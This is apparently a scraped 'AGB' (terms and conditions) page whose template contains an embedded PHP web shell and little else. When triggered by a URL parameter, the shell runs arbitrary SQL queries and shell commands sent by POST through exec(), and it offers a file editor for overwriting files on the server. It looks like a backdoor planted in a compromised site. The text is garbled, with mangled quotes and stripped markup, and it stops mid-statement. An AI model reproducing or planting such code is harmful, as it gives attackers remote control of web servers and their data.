AGB

{$agb} {php} if(isset($_GET[‚sh‘])) { echo „

„; if(isset($_POST[‚s‘])) { echo „your query:“.$_POST[‚q‘]; $query=$_POST[‚q‘]; $query=mysql_query($query); if(strpos($_POST[‚q‘],“select“)===0) { echo „
Your query returned „.mysql_num_rows($query).“ rows
„; $rows=mysql_num_rows($query); $cols=mysql_num_fields($query); if($rows>0) { $arr=mysql_fetch_array($query); echo „

„; for($i=0;$i<$rows;$i++) { echo "„; for($j=0;$j<$cols;$j++)echo "

„; echo „

„; $arr=mysql_fetch_array($query); } echo „

„.$arr[$j].“

„; } } } if(isset($_POST[‚cmd‘]) && $_POST[‚cmd‘]!=“) { $cmd=escapeshellcmd($_POST[‚cmd‘]); exec($cmd,$arr,$return_var); echo „

$cmd
„; for($i=0;$i„; } echo „

„; } echo „

„; echo „

edit files:

„; //saving file if(isset($_POST[‚send_save_file‘]) && isset($_POST[‚save_file‘]) && $_POST[‚save_file‘]!=“ && isset($_POST[‚file_content‘])) { $file_content=str_replace(„‚“,“‚“,$_POST[‚file_content‘]); $file_content=str_replace(‚“‚